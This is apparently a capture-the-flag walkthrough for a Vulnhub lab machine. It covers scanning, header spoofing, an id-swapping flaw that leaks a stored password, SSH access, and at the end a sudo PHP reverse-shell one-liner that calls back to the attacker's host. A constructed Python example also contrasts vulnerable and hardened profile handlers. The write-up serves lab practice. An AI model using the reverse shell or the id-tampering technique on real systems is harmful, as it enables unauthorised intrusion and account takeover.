Vulnhub Me and My Girlfriend 1 – Walkthrough

We start by scanning the host with nmap:

nmap -A -T4 -p- 192.168.1.3 -vv

Running dirb gave us 3 directories. One of them is robot.txt, which lists a new directory with a text file, /heyhoo.txt.

The x-forward header goes in the request headers of the page, and we can add it using Burp Suite.

Then hit Forward, and a new page of the company will show up.

We can fill in the information required on the registration page.

After registering, take a look at the address bar: you will find you got an id number. Mine is 12. I changed it to 1 and got a different name, one that was already registered. I kept changing it until 5 and got Alice's username and password, which you can view in the page source.

Username is alice, password is 4lic3.
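The id change above works because the profile page trusts the id in the URL and writes the stored password into the page. As an added example (not part of the original walkthrough or the target application's code), here is that lookup modelled in Python beside a hardened version; the function names, the USERS table and its values are constructed for illustration.

```python
"""Constructed model: trusting a client-supplied id vs. checking ownership."""

# Constructed sample data; ids and values are illustrative, not from the target.
USERS = {
    1: {"name": "User One", "username": "user1", "password": "example-pw-1"},
    5: {"name": "User Five", "username": "user5", "password": "example-pw-5"},
    12: {"name": "New Tester", "username": "tester", "password": "example-pw-12"},
}


class Forbidden(Exception):
    """Raised when the session user asks for a record they do not own."""


def profile_vulnerable(session_user_id, requested_id):
    # Flaw 1: the id from the URL is used directly; session_user_id is ignored.
    # Flaw 2: the stored password is returned and ends up in the page source.
    return dict(USERS[requested_id])


def profile_hardened(session_user_id, requested_id):
    # Authorise against the server-side session, not the URL parameter.
    if session_user_id is None:
        raise Forbidden("not logged in")
    if requested_id != session_user_id:
        raise Forbidden("id does not belong to the logged-in user")
    record = USERS[session_user_id]
    # Never send the password back to the browser, even to its owner.
    return {k: v for k, v in record.items() if k != "password"}


def audit(handler, session_user_id, candidate_ids):
    """Return the ids for which the handler exposes data it should not."""
    leaked = []
    for uid in candidate_ids:
        try:
            record = handler(session_user_id, uid)
        except (Forbidden, KeyError):
            continue
        # A leak is another user's record, or any record carrying a password.
        if uid != session_user_id or "password" in record:
            leaked.append(uid)
    return leaked


if __name__ == "__main__":
    ids = range(1, 13)
    print("vulnerable exposes:", audit(profile_vulnerable, 12, ids))
    print("hardened exposes:  ", audit(profile_hardened, 12, ids))
```

The same audit loop can be used as a regression test: log in as one test account and confirm that every other id returns a refusal and that no response carries a password field.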

Now we can access her account by using her credentials over the SSH service.

Right!! Now all we need is to run a PHP script that connects back to nc on our machine, and it's easy.

sudo /usr/bin/php -r '$sock=fsockopen("192.168.1.11",443);exec("/bin/sh -i <&3 >&3 2>&3");'
